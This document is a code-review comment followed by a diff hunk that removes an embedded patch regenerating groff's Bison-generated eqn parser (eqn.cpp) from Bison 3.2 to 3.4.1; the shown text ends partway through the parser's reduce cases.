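Review bot: The added description names `qen.hpp`, which looks like a typo for `eqn.hpp`, the header generated alongside `eqn.cpp`; the hunk that follows removes a section referencing `YY_YY_SRC_PREPROC_EQN_EQN_HPP_INCLUDED`. The line should read `We delete eqn.cpp and eqn.hpp in do_configure`. The `do_configure` deletion it refers to is not visible here, so confirm the recipe change lands in the same commit; otherwise the generated parser is neither patched nor regenerated.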
@@ -140,1029 +143,6 @@ index f95c05e..d875045 100644
#include <string.h>
#include <stdlib.h>
-diff --git a/src/preproc/eqn/eqn.cpp b/src/preproc/eqn/eqn.cpp
-index 4ede465..fdd9484 100644
---- a/src/preproc/eqn/eqn.cpp
-+++ b/src/preproc/eqn/eqn.cpp
-@@ -1,8 +1,9 @@
--/* A Bison parser, made by GNU Bison 3.2. */
-+/* A Bison parser, made by GNU Bison 3.4.1. */
-
- /* Bison implementation for Yacc-like parsers in C
-
-- Copyright (C) 1984, 1989-1990, 2000-2015, 2018 Free Software Foundation, Inc.
-+ Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2019 Free Software Foundation,
-+ Inc.
-
- This program is free software: you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
-@@ -47,7 +48,7 @@
- #define YYBISON 1
-
- /* Bison version. */
--#define YYBISON_VERSION "3.2"
-+#define YYBISON_VERSION "3.4.1"
-
- /* Skeleton name. */
- #define YYSKELETON_NAME "yacc.c"
-@@ -65,7 +66,11 @@
-
-
- /* First part of user prologue. */
--#line 18 "../src/preproc/eqn/eqn.ypp" /* yacc.c:338 */
-+#line 18 "src/preproc/eqn/eqn.ypp"
-+
-+#if HAVE_CONFIG_H
-+# include <config.h>
-+#endif
-
- #include <stdio.h>
- #include <string.h>
-@@ -77,7 +82,8 @@ extern int non_empty_flag;
- int yylex();
- void yyerror(const char *);
-
--#line 81 "src/preproc/eqn/eqn.cpp" /* yacc.c:338 */
-+#line 86 "src/preproc/eqn/eqn.cpp"
-+
- # ifndef YY_NULLPTR
- # if defined __cplusplus
- # if 201103L <= __cplusplus
-@@ -98,8 +104,8 @@ void yyerror(const char *);
- # define YYERROR_VERBOSE 0
- #endif
-
--/* In a future release of Bison, this section will be replaced
-- by #include "y.tab.h". */
-+/* Use api.header.include to #include this header
-+ instead of duplicating it here. */
- #ifndef YY_YY_SRC_PREPROC_EQN_EQN_HPP_INCLUDED
- # define YY_YY_SRC_PREPROC_EQN_EQN_HPP_INCLUDED
- /* Debug traces. */
-@@ -237,10 +243,9 @@ extern int yydebug;
-
- /* Value type. */
- #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
--
- union YYSTYPE
- {
--#line 30 "../src/preproc/eqn/eqn.ypp" /* yacc.c:353 */
-+#line 34 "src/preproc/eqn/eqn.ypp"
-
- char *str;
- box *b;
-@@ -249,9 +254,9 @@ union YYSTYPE
- int n;
- column *col;
-
--#line 253 "src/preproc/eqn/eqn.cpp" /* yacc.c:353 */
--};
-+#line 258 "src/preproc/eqn/eqn.cpp"
-
-+};
- typedef union YYSTYPE YYSTYPE;
- # define YYSTYPE_IS_TRIVIAL 1
- # define YYSTYPE_IS_DECLARED 1
-@@ -366,6 +371,8 @@ typedef short yytype_int16;
- #endif
-
-
-+#define YY_ASSERT(E) ((void) (0 && (E)))
-+
- #if ! defined yyoverflow || YYERROR_VERBOSE
-
- /* The parser invokes alloca or malloc; define the necessary symbols. */
-@@ -508,16 +515,16 @@ union yyalloc
- /* YYNSTATES -- Number of states. */
- #define YYNSTATES 142
-
--/* YYTRANSLATE[YYX] -- Symbol number corresponding to YYX as returned
-- by yylex, with out-of-bounds checking. */
- #define YYUNDEFTOK 2
- #define YYMAXUTOK 315
-
-+/* YYTRANSLATE(TOKEN-NUM) -- Symbol number corresponding to TOKEN-NUM
-+ as returned by yylex, with out-of-bounds checking. */
- #define YYTRANSLATE(YYX) \
- ((unsigned) (YYX) <= YYMAXUTOK ? yytranslate[YYX] : YYUNDEFTOK)
-
- /* YYTRANSLATE[TOKEN-NUM] -- Symbol number corresponding to TOKEN-NUM
-- as returned by yylex, without out-of-bounds checking. */
-+ as returned by yylex. */
- static const yytype_uint8 yytranslate[] =
- {
- 0, 2, 2, 2, 2, 2, 2, 2, 2, 63,
-@@ -558,14 +565,14 @@ static const yytype_uint8 yytranslate[] =
- /* YYRLINE[YYN] -- Source line where rule number YYN was defined. */
- static const yytype_uint16 yyrline[] =
- {
-- 0, 121, 121, 123, 128, 130, 141, 143, 145, 150,
-- 152, 154, 156, 158, 163, 165, 167, 169, 174, 176,
-- 181, 183, 185, 190, 192, 194, 196, 198, 200, 202,
-- 204, 206, 208, 210, 212, 214, 216, 218, 220, 222,
-- 224, 226, 228, 230, 232, 234, 236, 238, 240, 242,
-- 244, 246, 248, 250, 252, 254, 259, 269, 271, 276,
-- 278, 283, 285, 290, 292, 297, 299, 304, 306, 308,
-- 310, 314, 316, 321, 323, 325
-+ 0, 125, 125, 127, 132, 134, 145, 147, 149, 154,
-+ 156, 158, 160, 162, 167, 169, 171, 173, 178, 180,
-+ 185, 187, 189, 194, 196, 198, 200, 202, 204, 206,
-+ 208, 210, 212, 214, 216, 218, 220, 222, 224, 226,
-+ 228, 230, 232, 234, 236, 238, 240, 242, 244, 246,
-+ 248, 250, 252, 254, 256, 258, 263, 273, 275, 280,
-+ 282, 287, 289, 294, 296, 301, 303, 308, 310, 312,
-+ 314, 318, 320, 325, 327, 329
- };
- #endif
-
-@@ -818,22 +825,22 @@ static const yytype_uint8 yyr2[] =
-
- #define YYRECOVERING() (!!yyerrstatus)
-
--#define YYBACKUP(Token, Value) \
--do \
-- if (yychar == YYEMPTY) \
-- { \
-- yychar = (Token); \
-- yylval = (Value); \
-- YYPOPSTACK (yylen); \
-- yystate = *yyssp; \
-- goto yybackup; \
-- } \
-- else \
-- { \
-- yyerror (YY_("syntax error: cannot back up")); \
-- YYERROR; \
-- } \
--while (0)
-+#define YYBACKUP(Token, Value) \
-+ do \
-+ if (yychar == YYEMPTY) \
-+ { \
-+ yychar = (Token); \
-+ yylval = (Value); \
-+ YYPOPSTACK (yylen); \
-+ yystate = *yyssp; \
-+ goto yybackup; \
-+ } \
-+ else \
-+ { \
-+ yyerror (YY_("syntax error: cannot back up")); \
-+ YYERROR; \
-+ } \
-+ while (0)
-
- /* Error token number */
- #define YYTERROR 1
-@@ -948,7 +955,7 @@ yy_reduce_print (yytype_int16 *yyssp, YYSTYPE *yyvsp, int yyrule)
- YYFPRINTF (stderr, " $%d = ", yyi + 1);
- yy_symbol_print (stderr,
- yystos[yyssp[yyi + 1 - yynrhs]],
-- &(yyvsp[(yyi + 1) - (yynrhs)])
-+ &yyvsp[(yyi + 1) - (yynrhs)]
- );
- YYFPRINTF (stderr, "\n");
- }
-@@ -1052,7 +1059,10 @@ yytnamerr (char *yyres, const char *yystr)
- case '\\':
- if (*++yyp != '\\')
- goto do_not_strip_quotes;
-- /* Fall through. */
-+ else
-+ goto append;
-+
-+ append:
- default:
- if (yyres)
- yyres[yyn] = *yyp;
-@@ -1148,10 +1158,10 @@ yysyntax_error (YYSIZE_T *yymsg_alloc, char **yymsg,
- yyarg[yycount++] = yytname[yyx];
- {
- YYSIZE_T yysize1 = yysize + yytnamerr (YY_NULLPTR, yytname[yyx]);
-- if (! (yysize <= yysize1
-- && yysize1 <= YYSTACK_ALLOC_MAXIMUM))
-+ if (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM)
-+ yysize = yysize1;
-+ else
- return 2;
-- yysize = yysize1;
- }
- }
- }
-@@ -1175,9 +1185,10 @@ yysyntax_error (YYSIZE_T *yymsg_alloc, char **yymsg,
-
- {
- YYSIZE_T yysize1 = yysize + yystrlen (yyformat);
-- if (! (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM))
-+ if (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM)
-+ yysize = yysize1;
-+ else
- return 2;
-- yysize = yysize1;
- }
-
- if (*yymsg_alloc < yysize)
-@@ -1303,23 +1314,33 @@ yyparse (void)
- yychar = YYEMPTY; /* Cause a token to be read. */
- goto yysetstate;
-
-+
- /*------------------------------------------------------------.
--| yynewstate -- Push a new state, which is found in yystate. |
-+| yynewstate -- push a new state, which is found in yystate. |
- `------------------------------------------------------------*/
-- yynewstate:
-+yynewstate:
- /* In all cases, when you get here, the value and location stacks
- have just been pushed. So pushing a state here evens the stacks. */
- yyssp++;
-
-- yysetstate:
-+
-+/*--------------------------------------------------------------------.
-+| yynewstate -- set current state (the top of the stack) to yystate. |
-+`--------------------------------------------------------------------*/
-+yysetstate:
-+ YYDPRINTF ((stderr, "Entering state %d\n", yystate));
-+ YY_ASSERT (0 <= yystate && yystate < YYNSTATES);
- *yyssp = (yytype_int16) yystate;
-
- if (yyss + yystacksize - 1 <= yyssp)
-+#if !defined yyoverflow && !defined YYSTACK_RELOCATE
-+ goto yyexhaustedlab;
-+#else
- {
- /* Get the current used size of the three stacks, in elements. */
- YYSIZE_T yysize = (YYSIZE_T) (yyssp - yyss + 1);
-
--#ifdef yyoverflow
-+# if defined yyoverflow
- {
- /* Give user a chance to reallocate the stack. Use copies of
- these so that the &'s don't force the real ones into
-@@ -1338,10 +1359,7 @@ yyparse (void)
- yyss = yyss1;
- yyvs = yyvs1;
- }
--#else /* no yyoverflow */
--# ifndef YYSTACK_RELOCATE
-- goto yyexhaustedlab;
--# else
-+# else /* defined YYSTACK_RELOCATE */
- /* Extend the stack our own way. */
- if (YYMAXDEPTH <= yystacksize)
- goto yyexhaustedlab;
-@@ -1357,12 +1375,11 @@ yyparse (void)
- goto yyexhaustedlab;
- YYSTACK_RELOCATE (yyss_alloc, yyss);
- YYSTACK_RELOCATE (yyvs_alloc, yyvs);
--# undef YYSTACK_RELOCATE
-+# undef YYSTACK_RELOCATE
- if (yyss1 != yyssa)
- YYSTACK_FREE (yyss1);
- }
- # endif
--#endif /* no yyoverflow */
-
- yyssp = yyss + yysize - 1;
- yyvsp = yyvs + yysize - 1;
-@@ -1373,19 +1390,18 @@ yyparse (void)
- if (yyss + yystacksize - 1 <= yyssp)
- YYABORT;
- }
--
-- YYDPRINTF ((stderr, "Entering state %d\n", yystate));
-+#endif /* !defined yyoverflow && !defined YYSTACK_RELOCATE */
-
- if (yystate == YYFINAL)
- YYACCEPT;
-
- goto yybackup;
-
-+
- /*-----------.
- | yybackup. |
- `-----------*/
- yybackup:
--
- /* Do appropriate processing given the current state. Read a
- lookahead token if we need one and don't already have one. */
-
-@@ -1443,7 +1459,6 @@ yybackup:
- YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
- *++yyvsp = yylval;
- YY_IGNORE_MAYBE_UNINITIALIZED_END
--
- goto yynewstate;
-
-
-@@ -1458,7 +1473,7 @@ yydefault:
-
-
- /*-----------------------------.
--| yyreduce -- Do a reduction. |
-+| yyreduce -- do a reduction. |
- `-----------------------------*/
- yyreduce:
- /* yyn is the number of a rule to reduce with. */
-@@ -1478,20 +1493,20 @@ yyreduce:
- YY_REDUCE_PRINT (yyn);
- switch (yyn)
- {
-- case 3:
--#line 124 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+ case 3:
-+#line 128 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].b)->top_level(); non_empty_flag = 1; }
--#line 1485 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1500 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 4:
--#line 129 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 133 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1491 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1506 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 5:
--#line 131 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 135 "src/preproc/eqn/eqn.ypp"
- {
- list_box *lb = (yyvsp[-1].b)->to_list_box();
- if (!lb)
-@@ -1499,436 +1514,437 @@ yyreduce:
- lb->append((yyvsp[0].b));
- (yyval.b) = lb;
- }
--#line 1503 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1518 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 6:
--#line 142 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 146 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1509 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1524 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 7:
--#line 144 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 148 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_mark_box((yyvsp[0].b)); }
--#line 1515 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1530 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 8:
--#line 146 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 150 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_lineup_box((yyvsp[0].b)); }
--#line 1521 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1536 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 9:
--#line 151 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 155 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1527 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1542 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 10:
--#line 153 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 157 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-2].b), 0, (yyvsp[0].b)); }
--#line 1533 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1548 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 11:
--#line 155 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 159 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-2].b), (yyvsp[0].b), 0); }
--#line 1539 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1554 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 12:
--#line 157 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 161 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-4].b), (yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1545 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1560 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 13:
--#line 159 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 163 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_limit_box((yyvsp[-4].b), make_limit_box((yyvsp[-2].b), (yyvsp[0].b), 0), 0); }
--#line 1551 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1566 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 14:
--#line 164 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 168 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1557 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1572 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 15:
--#line 166 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 170 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_sqrt_box((yyvsp[0].b)); }
--#line 1563 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1578 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 16:
--#line 168 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 172 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_over_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1569 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1584 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 17:
--#line 170 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 174 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_small_over_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1575 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1590 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 18:
--#line 175 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 179 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1581 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1596 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 19:
--#line 177 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 181 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_script_box((yyvsp[-2].b), 0, (yyvsp[0].b)); }
--#line 1587 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1602 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 20:
--#line 182 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 186 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[0].b); }
--#line 1593 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1608 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 21:
--#line 184 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 188 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_script_box((yyvsp[-2].b), (yyvsp[0].b), 0); }
--#line 1599 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1614 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 22:
--#line 186 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 190 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_script_box((yyvsp[-4].b), (yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1605 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1620 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 23:
--#line 191 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 195 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = split_text((yyvsp[0].str)); }
--#line 1611 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1626 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 24:
--#line 193 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 197 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new quoted_text_box((yyvsp[0].str)); }
--#line 1617 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1632 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 25:
--#line 195 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 199 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = split_text((yyvsp[0].str)); }
--#line 1623 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1638 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 26:
--#line 197 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 201 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new quoted_text_box((yyvsp[0].str)); }
--#line 1629 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1644 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 27:
--#line 199 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 203 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new half_space_box; }
--#line 1635 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1650 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 28:
--#line 201 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 205 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new space_box; }
--#line 1641 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1656 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 29:
--#line 203 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 207 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new tab_box; }
--#line 1647 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1662 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 30:
--#line 205 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 209 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[-1].b); }
--#line 1653 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1668 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 31:
--#line 207 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 211 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(CENTER_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1659 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1674 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 32:
--#line 209 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 213 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(LEFT_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1665 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1680 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 33:
--#line 211 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 215 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(RIGHT_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1671 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1686 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 34:
--#line 213 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 217 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].pb)->set_alignment(CENTER_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1677 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1692 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 35:
--#line 215 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 219 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = (yyvsp[-1].mb); }
--#line 1683 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1698 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 36:
--#line 217 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 221 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_delim_box((yyvsp[-3].str), (yyvsp[-2].b), (yyvsp[0].str)); }
--#line 1689 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1704 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 37:
--#line 219 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 223 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_delim_box((yyvsp[-1].str), (yyvsp[0].b), 0); }
--#line 1695 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1710 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 38:
--#line 221 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 225 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_overline_box((yyvsp[-1].b)); }
--#line 1701 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1716 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 39:
--#line 223 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 227 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_underline_box((yyvsp[-1].b)); }
--#line 1707 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1722 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 40:
--#line 225 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 229 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_prime_box((yyvsp[-1].b)); }
--#line 1713 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1728 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 41:
--#line 227 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 231 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_accent_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1719 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1734 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 42:
--#line 229 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 233 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_uaccent_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1725 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1740 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 43:
--#line 231 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 235 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new font_box(strsave(get_grfont()), (yyvsp[0].b)); }
--#line 1731 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1746 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 44:
--#line 233 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 237 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new font_box(strsave(get_gbfont()), (yyvsp[0].b)); }
--#line 1737 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1752 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 45:
--#line 235 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 239 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new font_box(strsave(get_gfont()), (yyvsp[0].b)); }
--#line 1743 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1758 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 46:
--#line 237 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 241 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new fat_box((yyvsp[0].b)); }
--#line 1749 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1764 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 47:
--#line 239 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 243 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new font_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1755 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1770 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 48:
--#line 241 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 245 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new size_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1761 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1776 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 49:
--#line 243 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 247 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new hmotion_box((yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1767 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1782 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 50:
--#line 245 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 249 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new hmotion_box(-(yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1773 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1788 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 51:
--#line 247 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 251 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new vmotion_box((yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1779 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1794 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 52:
--#line 249 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 253 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new vmotion_box(-(yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1785 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1800 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 53:
--#line 251 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 255 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].b)->set_spacing_type((yyvsp[-1].str)); (yyval.b) = (yyvsp[0].b); }
--#line 1791 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1806 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 54:
